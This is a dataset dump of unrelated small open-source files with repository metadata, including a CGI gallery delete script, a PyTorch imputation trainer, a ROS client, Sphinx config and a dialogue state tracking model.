] | permissive | VinnieJohns/barancev_python_training | ebc36271ae745d58d286da337b59bd1d169d9ba6 | 10627548f2d797575f239fef6de345bc0d44921a | refs/heads/master | 2021-01-10T20:35:53.711646 | 2015-05-12T20:55:09 | 2015-05-12T20:55:09 | 31,509,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | __author__ = 'VinnieJohns'
import random
import string
def random_string(prefix, maxlen):
    """Return `prefix` plus a random tail of at most `maxlen - 1` characters.

    The tail is drawn from letters, digits and punctuation; single quotes
    are excluded and spaces are over-weighted ten-fold, after which double
    spaces are collapsed to single ones.
    """
    # ' and spaces signs are replaced to avoid known failures
    symbols = string.ascii_letters + string.digits + string.punctuation.replace("'", "") + " "*10
    return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))]).replace("  ", " ")
# English month names, January through December, in calendar order.
months_list = ["January", "February", "March",
               "April", "May", "June",
               "July", "August", "September",
               "October", "November", "December"]
| [
"novikov.d12@gmail.com"
] | novikov.d12@gmail.com |
326379cea86e0516daf08cfd4161e352da2b6c0a | 21ab826db670e26024050536f0e2c5a6354d53cf | /project-euler/p015.py | 6960b8726d68fc57732635cd32e42e1704994fcc | [] | no_license | mingrammer/problem-solving | 32a6cba9545fcb7cda99314c9fb6d68dd94de985 | d9cd8aaea6dcbe79b4689634ffc92eee0031cc65 | refs/heads/master | 2022-11-26T15:46:39.372093 | 2020-08-01T11:00:58 | 2020-08-01T11:00:58 | 36,556,280 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | # Lattice paths
# Project Euler 15 (lattice paths): the number of monotonic routes through an
# n x n grid is the central binomial coefficient C(2n, n) = (2n)! / (n!)^2.
from math import factorial as f

n = 20
# Use integer floor division: the quotient is exact, whereas true division
# would yield a float and lose precision for larger n.
print(f(2 * n) // (f(n) ** 2))
| [
"mingrammer@gmail.com"
] | mingrammer@gmail.com |
881504c3abee2e2338c4e7c12b8138d4dad30849 | 6581d4f7607f11ee46a29f5a2a00264bd4b1b188 | /4131-Internet_Programming/assignment5-cgi-gallery-multiuser/delete.cgi | ae39e61ba6e6ecb298ede5a53265f3640c4fa41f | [] | no_license | marvintv/apollo-academia-umn | 099bccd9bc33f70b9ea6b24d9fa02cf06196446c | a283d50eff1d0e7c158479ddc8e17932d518104a | refs/heads/master | 2021-05-31T05:05:34.292432 | 2016-04-25T06:44:35 | 2016-04-25T06:44:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | cgi | #!/usr/bin/python
import cgi
import os
import glob
from shared import * # import common templates and variables
from database import * # import database to check role
# Python 2 CGI script: confirms (GET) and performs (POST) deletion of a
# gallery image identified by the "id" query/form parameter.
form = cgi.FieldStorage()
fileid = form.getvalue("id")  # may be None when no id was supplied
title = ""
msg = ""
success = False
# check if logged in and if owner
if not isLoggedIn():
    REDIRECT('login.html')
else:
    db = Database()
    if not db.isOwnerFromCookie():
        REDIRECT('gallery.cgi')
# check query string (if GET) and display relevant message, else delete with POST
if os.environ['REQUEST_METHOD'] == 'GET':
    if fileid is not None:
        try:
            # The image's title lives in a sidecar <id>.txt file.
            filePath = os.path.join(UPLOAD_DIR, fileid + ".txt")
            title = getTitle(filePath)
        except Exception as e:
            msg = """<div id="message"> Invalid ID. Please return to the <a href="gallery.cgi">Gallery </a> to select a VALID image for deletion. </div>"""
    else:
        msg = """<div id="message"> Please return to the <a href="gallery.cgi">Gallery </a> to select an image for deletion. </div>"""
else: # delete the files!
    # NOTE(review): on POST, fileid may still be None, in which case the
    # os.path.join below raises TypeError -- confirm upstream validation.
    filePath = os.path.join(UPLOAD_DIR, fileid + ".jpg")
    if os.path.isfile(filePath):
        try:
            # Remove the image and every sidecar file sharing its id prefix.
            for fileName in glob.glob(os.path.join(UPLOAD_DIR, fileid + "*")): # much cleaner
                os.remove(fileName)
            success = True # writing true wasted my half an hour, tired.
            msg = "NOT NONE"
        except Exception as e:
            msg = """<div id="message"> Something went wrong, could not delete image. Please try again. """
    else:
        msg = """<div id="message"> Something went wrong, or image has already been deleted. Please try another. """
# Confirmation form shown on GET; re-posts the same id back to this script.
deleteForm = """
<form name="deleteForm" action="delete.cgi" method="POST" enctype="multipart/form-data">
%(msg)s
Are you sure? You want to delete picture [ %(title)s ]. <br/>
<input name="id" type="hidden" value="%(fileid)s"/>
<button name="submit" type="submit"> Yes </button>
<a href="gallery.cgi"> <button type="button">Cancel</button></a>
</form>
""" % { 'title' : title, 'msg': msg, 'fileid': fileid }
strings = {
    'windowTitle': "Delete Photo",
    'title': "Delete Picture",
    'body': deleteForm
}
# GET: render the confirmation page (or the error message if one was set).
if os.environ['REQUEST_METHOD'] == 'GET':
    if msg != "":
        strings['body'] = msg
    print 'content-type: text/html\n'
    print HTML_TEMPLATE % strings
# Only true here if we post and fail the top conditions; else redirected.
if not success and os.environ['REQUEST_METHOD'] == 'POST':
    strings['body'] = msg
    print 'content-type: text/html\n'
    print HTML_TEMPLATE % strings
if success and os.environ['REQUEST_METHOD'] == 'POST':
    REDIRECT('gallery.cgi')
| [
"leewenchuan.lwc@gmail.com"
] | leewenchuan.lwc@gmail.com |
25186efeae2e482cb55a1c90ce296d3a932ba232 | e757b98dccb9f29c0a22be3e938c89e7fe40e9b1 | /setup.py | 49304b0917c3fe4fc7045f9786551b4832c892e0 | [] | no_license | tipmeet/tippresence | bb031ebfc23fa5fc067ef0ea53767fcbb45e7bf4 | 2a512c1586bae89927e84ab5a163e6eac51dbfc0 | refs/heads/master | 2021-01-18T05:28:42.447009 | 2011-07-19T08:22:04 | 2011-07-19T08:22:04 | 1,389,392 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 847 | py | #!/usr/bin/env python
from setuptools import setup, find_packages
if __name__ == '__main__':
setup(
name='tippresence',
description='Presence server with SIP/HTTP interfaces written in Twisted Python',
license='MIT',
url = 'http://github.com/ivaxer/tippresence',
keywords = "SIP VoIP",
author='John Khvatov',
author_email='ivaxer@imarto.net',
install_requires = ['tipsip'],
packages = find_packages(),
test_suite='tippresence.tests',
package_data = {
'tippresence.amqp': ['amqp0-8.xml'],
},
data_files = [
('/etc/tippresence', ['etc/tippresence/tippresence.tac']),
('/etc/init', ['etc/init/tippresence.conf']),
],
)
| [
"ivaxer@imarto.net"
] | ivaxer@imarto.net |
741329c6619ac5059c1d42a35814dc330de3165e | cdb26c82ceadb29752c6390bcb6511266d22af94 | /prompts.py | b2ed6457caf5318604b453bd515ef9d609b92886 | [] | no_license | raghukotha/kuvanassist | b0d3531b6452b7f2373345decdce76f123d3bd2e | cd697357f6f838810540d3f7c75688828cb22725 | refs/heads/master | 2022-06-01T00:53:39.041047 | 2020-05-03T00:01:14 | 2020-05-03T00:01:14 | 260,300,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | KUVAN_WELCOME_MESSAGE = """
Welcome to KUVAN Assist. I am Your personal assistant and am here to help support
you with your KUVAN Treatment. This setup exercise will take less than five minutes.
Let us get started. You can get started by saying I am now taking medication KUVAN.
"""
# Follow-up prompt spoken after the user mentions medication; nudges them to
# say the "Create reminder" intent.
KUVAN_YOU_WANT_METO_REMIND = 'So you want me to remind about medication. Is that right? If so please say "Create reminder".'
| [
"raghu_kotha@yahoo.com"
] | raghu_kotha@yahoo.com |
e6f091efcc919fd2b66d19efe2d9162e7d7f49bc | 076459cf0f988048952fcf28cb6695ca41a255cc | /ogretici_paket/scripts/zaman_client.py | bf96da305b1f0ff219204c9aa227a7ad9a4226f3 | [] | no_license | moguztas/uygulamalarla_ros | f8007ac9747b888125a577084c2dd53ace7110d7 | 6cf350fc8900da9d6502c85cd935cee6574a4535 | refs/heads/master | 2023-01-30T17:52:08.491600 | 2020-12-06T18:19:44 | 2020-12-06T18:19:44 | 272,462,642 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #!/usr/bin/env python
import sys
import rospy
from ogretici_paket.srv import GecenZaman
def istekte_bulun(x):
rospy.wait_for_service('zaman')
try:
sure_hesapla = rospy.ServiceProxy('zaman', GecenZaman)
cevap = sure_hesapla(x)
return cevap.gecen_sure
except rospy.ServiceException:
pass
if __name__ == "__main__":
if len(sys.argv) == 2:
x = int(sys.argv[1])
else:
sys.exit(1)
print ("Gidilecek mesafe: %d metre"%(x))
print ("Hedefe varana kadar gecen sure: %d saniye."%(istekte_bulun(x))) | [
"noreply@github.com"
] | moguztas.noreply@github.com |
25967920e75910dd4dbb5fa762724521d721d10c | ae300efd9706d1facfb1150dd23dbdf25a7307ad | /app/discrete/App.py | 7bec4d3b3d7fa5aaae7e9ebf37131d3a7d62da58 | [] | no_license | markreha/cloudpi | 7b3e3ad4421cc2a676463d9e2b24b2f79068a09d | 416d131053309712690178be9ecec706a0fbf59f | refs/heads/master | 2021-11-01T17:09:00.305664 | 2021-10-07T14:26:50 | 2021-10-07T14:26:50 | 95,674,778 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | import Config as cfg
from TemperatureSensor import TemperatureSensor
from LED import LED
import datetime
import json
import requests
import time
# Load the current Environment Configuration
print("Running Sensor Application v0.1")
if cfg.environment == "dev1":
print("Running Dev 1 Environment Configuration")
environment = cfg.env_dev1
elif cfg.environment == "dev2":
print("Running Dev 2 Environment Configuration")
environment = cfg.env_dev2
elif cfg.environment == "qa":
print("Running QA Environment Configuration")
environment = cfg.env_qa
else:
print("Running Production Environment Configuration")
environment = cfg.env_prod
# Application constants from Environment and Configuration file
sampleTime = cfg.sampleTime
debug = cfg.debug
deviceID = cfg.deviceID
webApiUrl = environment["webApi"]
webApiUsername = environment["username"]
webApiPassword = environment["password"]
# Create an indicator LED on GPIO pin 17
led = LED(17)
# Create the Temperature Sensor on GPIO pin 4
temperatureSensor = TemperatureSensor(4)
# Dictionary to hold Temperature Sensor data
temperatureData = {}
# Sit in a loop reading the sensors every sampleTime, convert result to JSON, and POST to the Web API
while True:
# Turn LED ON
led.on()
# Read the Temperature Sensor
temperatureSensor.read()
if temperatureSensor.valid:
# Save the Temperature Sensor results in a Temperature Data Object
temperatureData["deviceID"] = deviceID
temperatureData["temperature"] = temperatureSensor.temperatureF
temperatureData["humidity"] = temperatureSensor.humidity
temperatureData["pressure"] = 0
# Print results to the console if in debug mode
if debug:
print("Sampled at %s Temperature: %.2f F Humidity: %.2f" % (str(datetime.datetime.now()), temperatureData["temperature"], temperatureData["humidity"]))
# Convert the Temperature Data Object to JSON string
strj = json.dumps(temperatureData, ensure_ascii=False)
# POST the JSON results to the RESTful Web API using HTTP Basic Authentication
response = requests.post(webApiUrl, strj, headers={'Content-Type':'application/json'}, auth=(webApiUsername, webApiPassword))
if response.status_code == 200:
strj = response.json()
print("Response status is %s with message of %s" % (strj["status"], strj["message"]))
else:
print("Response Error: %d" % response.status_code)
else:
print("Temperature Sensor Error")
# Turn LED OFF
led.off()
# Sleep until we need to read the sensors again
time.sleep(sampleTime)
| [
"mark@Marks-MacBook-Pro.local"
] | mark@Marks-MacBook-Pro.local |
201617e3c98c2c8d3e7e7f717bff300bc4405cf3 | c70b0685c47059ce690e0390054d085af58eb0a7 | /docs/conf.py | 72e5bbb0598f62006e4fdbbe12e9b05be0ef89b6 | [
"MIT"
] | permissive | tayfun/bilgisayfam | 13ede05f116c3ffa5c9ecfcaa09ab9eb0410b7c1 | f2f9942be53abefc1caf31509553c46957195535 | refs/heads/master | 2021-01-01T19:11:27.725112 | 2014-10-05T20:52:34 | 2014-10-05T20:52:34 | 5,346,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,848 | py | # -*- coding: utf-8 -*-
#
# bilgisayfam_project documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 17 11:46:20 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bilgisayfam_project'
copyright = u'2013, ChangeMyName'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bilgisayfam_projectdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'bilgisayfam_project.tex', u'bilgisayfam_project Documentation',
u'ChangeToMyName', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bilgisayfam_project', u'bilgisayfam_project Documentation',
[u'ChangeToMyName'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bilgisayfam_project', u'bilgisayfam_project Documentation',
u'ChangeToMyName', 'bilgisayfam_project', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"ts@tayfunsen.com"
] | ts@tayfunsen.com |
f5f7b157ea9d5a2354c0805cea334cfac3408e7b | 0a4031c062c098811c3b419b94ccf96724439107 | /json-quiz/3.py | 3792c2d4d8cd12eef82fce1a96bcc06d32b59ffc | [] | no_license | dflatow/compjour-hw | d934ac6b9d22ca923100d023809fa32103e8e74a | 4a26854769c31536247acb41b35f32fb55ab1e59 | refs/heads/master | 2020-05-05T03:17:49.699470 | 2015-06-02T02:15:55 | 2015-06-02T02:15:55 | 33,497,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import requests
import json
data_url = "http://www.compjour.org/files/code/json-examples/maps.googleapis-geocode-mcclatchy.json"
# fetch the data file
response = requests.get(data_url)
text = response.text
# parse the data
data = json.loads(text)
print('A.', data['results'][0]['formatted_address'])
print('B.', data['status'])
print('C.', data['results'][0]['geometry']['location_type'])
print('D.', data['results'][0]['geometry']['location']['lat'])
print('E.', data['results'][0]['geometry']['viewport']['southwest']['lng'])
num_to_print = 2
sep = ', '
print('F.', sep.join([x['long_name'] for x in data['results'][0]['address_components'][:num_to_print]])) | [
"daflatow@gmail.com"
] | daflatow@gmail.com |
6c39c3e981abfb7cb8b41215d557e2d06b0646ad | b50f93b1b0a5955e80a9f86816eb439edc280ef1 | /train.py | 87e3c2af76575c66f9e956609543f276b758b8e8 | [] | no_license | falcong/DAE_impute | aba8a9703a2bbefc4f4a4b94fd19438b644e8cfb | 7314d592adbe2e3947673fc55d874d0543f3a205 | refs/heads/master | 2022-07-13T21:54:58.555657 | 2020-05-13T16:46:01 | 2020-05-13T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,954 | py | import argparse
import os
import torch
from data import MissDataset, MissDataLoader
from TCDAE import TCDAE
from utils import *
import random
import math
import torch.nn as nn
import torch.nn.utils.rnn as rnn
import torch.utils.data as data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(
"Time series missing data imputation"
"with Temporal Convolutional Denoising Autoencoder")
parser.add_argument('--train_path', type=str, default='./input/air.npy',
help='directory of train data, with npy format')
parser.add_argument('--B', default=128, type=int,
help='Number of channels in bottleneck 1 × 1-conv block')
parser.add_argument('--H', default=128, type=int,
help='Number of channels in convolutional blocks')
parser.add_argument('--P', default=3 , type=int,
help='Kernel size in convolutional blocks')
parser.add_argument('--L', default=2, type=int,
help='Number of convolutional blocks in each repeat')
parser.add_argument('--R', default=2, type=int,
help='Number of repeats')
parser.add_argument('--C', default=0.2, type=float,
help='Probability of dropout in input layer')
parser.add_argument('--epochs', default=10, type=int,
help='Number of maximum epochs')
parser.add_argument('--lr', default=1e-4, type=float,
help='Init learning rate')
parser.add_argument('--l2', default=1e-3, type=float,
help='weight decay (L2 penalty)')
# minibatch
parser.add_argument('--shuffle', default=1, type=int,
help='reshuffle the data at every epoch')
parser.add_argument('--batch_size', default=64, type=int,
help='Batch size')
#parser.add_argument('--num_workers', default=4, type=int,
# help='Number of workers to generate minibatch')
parser.add_argument('--save_folder', default='./output/',
help='Location to save epoch models')
def train(dataLoader, args, train_z, train_m):
model = TCDAE(N=args.N, B=args.B, H=args.H, P=args.P, X=args.L, R=args.R, C=args.C)
num_param(model)
model.cuda()
model = torch.nn.DataParallel(model)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2)
loss_fn = MaskLoss()
loss_list = []
best_rmse = 1e8
for epoch in range(args.epochs):
model.train()
for i, (z, m) in enumerate(dataLoader):
z = Variable(z).cuda()
m = Variable(m).cuda()
decoded = model(z, m)
loss = loss_fn(decoded, z, m)#Denosing: calculate loss by decode and complete data
#loss = loss_fn(decoded, raw_x)
optimizer.zero_grad()
loss.backward()
optimizer.step()
model.eval()
step_loss = get_step_loss(model, train_z, train_m)
loss_list.append(step_loss)
#test_rmse = get_rmse(model, train_x, train_z, train_m)
print (epoch, 'Step loss:', step_loss)#, ' Test rmse:', test_rmse)
#if best_rmse > test_rmse:
# best_rmse = test_rmse
save_path = os.path.join(args.save_folder, 'model_epoch_%d.pth' % (epoch))
torch.save(model.module, save_path)
#save(model, train_x, train_z, train_m)
#draw_curve(loss_list, 'RMSE', 'RMSE')
#print('Best Test RMSE', best_rmse)
return model
def main(args):
train_z, train_m, _, _ = MissDataLoader(args.train_path)
train_set = MissDataset(train_z, train_m)
args.N = train_z.shape[1]
train_loader = data.DataLoader(train_set, batch_size=args.batch_size, shuffle=args.shuffle)
if not os.path.exists(args.save_folder):
os.makedirs(args.save_folder)
model = train(train_loader, args, train_z, train_m)
torch.save(model.module, os.path.join(args.save_folder, 'final.pth'))
if __name__ == '__main__':
args = parser.parse_args()
print(args)
main(args)
| [
"1146628217@qq.com"
] | 1146628217@qq.com |
27d84525c635d282c71896b4d755ef60be36f03f | 55e55605975a844796e130aab44f4b5a15615207 | /Leitor/leitorXML.py | 5ab094d24f2deb1a483761519e70224165bc078f | [] | no_license | thiagoSilvaGit/PDE-NPDP | 8a6bf8726774787a45e7aa835de8c51496b54921 | 48af68c049eb1a2ee3873f7d7888d5242b68313e | refs/heads/master | 2021-05-04T05:26:11.992600 | 2021-04-09T17:21:09 | 2021-04-09T17:21:09 | 120,337,404 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 614 | py | # -*- coding: utf-8 -*-
import xmlschema
from pprint import pprint
def LerXML(arq):
xs = xmlschema.XMLSchema('instancia2.xsd')
#print "XML válido: {}".format(xs.is_valid(arq))
b = xs.to_dict(arq)
#pprint(b)
my_dict = xs.to_dict(arq)
return my_dict
def LerXMLGen(arq):
xs = xmlschema.XMLSchema('gerafile.xsd')
print(xs.is_valid(arq))
pprint(xs.to_dict(arq))
my_dict = xs.to_dict(arq)
return my_dict
def LerXMLConf(arq):
xs = xmlschema.XMLSchema('conf.xsd')
print(xs.is_valid(arq))
pprint(xs.to_dict(arq))
my_dict = xs.to_dict(arq)
return my_dict
| [
"thiagoSilvaGit@users.noreply.github.com"
] | thiagoSilvaGit@users.noreply.github.com |
59b0fbaaadba789abda8ee705a64c83eb5c623dd | ff80369ce7fdd6229ee79849b44e780d8639b5fa | /model/woz_model.py | 73d1b537dd0d5e5bedbc60b326c9d2a933d46717 | [] | no_license | YourThomasLee/DSTer | 5878717611fc9dcab3360ca3d4162f5efc691b22 | 9f0efbf5a0d1f558dc9d02aa05dd8e05c853fcb1 | refs/heads/master | 2023-09-01T19:54:15.736185 | 2023-08-18T10:00:42 | 2023-08-18T10:00:42 | 230,451,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,231 | py | # -*- encoding: utf-8 -*-
from transformers import AutoModel
import torch
import torch.nn as nn
import torch.nn.functional as F
from copy import deepcopy as c
from base import BaseModel
from trainer.data_loaders import tokenizer
from model.attention import MultiHeadedAttention
from model.feed_forward_net import FeedForwardNet
def clones(module, N):
"Produce N identical layers."
return nn.ModuleList([c(module) for _ in range(N)])
class WozEmbedding(nn.Module):
def __init__(self, bert_name, d_model, dropout):
super(WozEmbedding, self).__init__()
self.bert_layer = AutoModel.from_pretrained(bert_name)
self.bert_layer.resize_token_embeddings(len(tokenizer))
def forward(self, context_ids, cur_utt_ids, pre_states_ids):
context_embed = self.bert_layer(context_ids)
cur_utt_embed = self.bert_layer(cur_utt_ids)
pre_states_embed = {k: self.bert_layer(v).pooler_output for k, v in pre_states_ids.items()}
embeddings = {"context": context_embed,
"cur_utt": cur_utt_embed,
"pre_states": pre_states_embed
}
return embeddings # batch_size * sentence_len * 768
class CrossLayer(nn.Module):
'''
input:
- context: user_utterrance + system_utterrance ... of previous turns => self_attention
- usr_utt: user_utterance in current turn => attention(usr_utt, context, )
- previous_states: belief_state in previous turn
- slot_gate_logit
- slot_value_logit
'''
def __init__(self, attn_heads, d_model, dropout):
super(CrossLayer, self).__init__()
self.attns = clones(MultiHeadedAttention(attn_heads, d_model, dropout), 3)
self.normalize_layer = clones(nn.Sequential(
nn.Linear(768, d_model),
nn.LayerNorm(d_model),
nn.Dropout(dropout)
),
3)
self.norms = clones(nn.LayerNorm(d_model), 2)
self.ffns = clones(FeedForwardNet(d_model, int(1.5 * d_model), dropout), 2)
def _init_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
module.weight.data.normal_(mean=0.0, std=0.02)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def forward(self, embeddings, masks):
i = 0
fea = dict()
for k,v in embeddings.items():
if "last_hidden_state" in v.keys(): # cur_utt, context
fea[k] = self.normalize_layer[i](v['last_hidden_state'])
elif len(v.keys()) > 29: # slots
if k not in fea: fea[k] = dict()
for slot, embed in v.items():
fea[k][slot] = self.normalize_layer[i](embed)
i += 1
pred_input = dict()
# preNorm + residual connection
cur_utt_attn = fea['cur_utt'] + self.attns[0](
fea['cur_utt'], fea['context'], fea['context'],
masks['context']
)
pred_input['cur_utt'] = cur_utt_attn + self.ffns[0](self.norms[0](cur_utt_attn))
pred_input['slots_gates'] = dict()
for k,v in fea['pre_states'].items():
v_attn = v + self.attns[1](
v.unsqueeze(-2), pred_input['cur_utt'], pred_input['cur_utt'],
masks['cur_utt']
).squeeze(-2)
pred_input['slots_gates'][k] = v_attn + self.ffns[1](self.norms[1](v_attn))
return pred_input
class TaskLayer(nn.Module):
'''
input:
- context: utterance history
- usr_utt: user_utterance
- domains - slots:
- previous_states:
- cur_states:
'''
def __init__(self, slots, slots_classification, d_model, dropout):
super(TaskLayer, self).__init__()
self.is_classification = nn.Parameter(torch.tensor([1 if i in slots_classification else 0 for i in slots]), requires_grad=False)
self.gates_layer = nn.Linear(d_model, 2) # slot_gates_prediction
self.values_layer = nn.Linear(d_model, 15) # slot_value_prediction
def _init_weights(self, module):
if isinstance(module, (nn.Linear, nn.Embedding)):
module.weight.data.normal_(mean=0.0, std=0.02)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def forward(self, input):
logits = dict()
slots_fea = torch.stack([v for k, v in input['slots_gates'].items()], dim=1)
logits['slots_gates'] = self.gates_layer(slots_fea)
logits['slots_values'] = self.values_layer(slots_fea)#.masked_fill(self.is_classification.unsqueeze(0).unsqueeze(-1) == 0, 0.0)
return logits
class WozModel(BaseModel):
def __init__(self, bert_name,
domain_slots,
slots_classification,
d_model,
dropout,
attn_heads,
**kargs
):
super(WozModel, self).__init__()
self.embedding = WozEmbedding(bert_name, d_model, dropout)
self.cross_layer = CrossLayer(attn_heads, d_model, dropout)
self.task_layer = TaskLayer(domain_slots, slots_classification, d_model, dropout)
def forward(self, batch):
embeddings = self.embedding(batch['context_ids'],
batch['cur_utt_ids'],
batch['pre_states_ids']
)
masks = {"context": batch["context_mask"],
"cur_utt": batch["cur_utt_mask"],
"pre_states": batch["pre_states_mask"],
}
pred_input = self.cross_layer(embeddings, masks)
logits = self.task_layer(pred_input)
return logits
| [
"baizhen9406@163.com"
] | baizhen9406@163.com |
ce79e3ebe49d76065f91853f41084084a188bfa6 | c738f40e7a9c2e5a9712cccd88c7f0e79b7167eb | /mysite/mysite/urls.py | 8d3e44717d88cdfda2f051a78a5eee60f4100176 | [] | no_license | sitayebsofiane/tutorial_django | f100717c563b61e87e8cfb7771c907ecdcbabf67 | 91058987ae706080dbe6c8af78b5f4636975fb74 | refs/heads/master | 2021-03-26T04:33:44.309167 | 2020-03-19T11:21:03 | 2020-03-19T11:21:03 | 247,672,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import include, path
from . import views
urlpatterns = [
path('polls/', include('polls.urls')),
path('admin/', admin.site.urls),
url('', views.home),
]
| [
"sitayebsofiane51@gmail.com"
] | sitayebsofiane51@gmail.com |
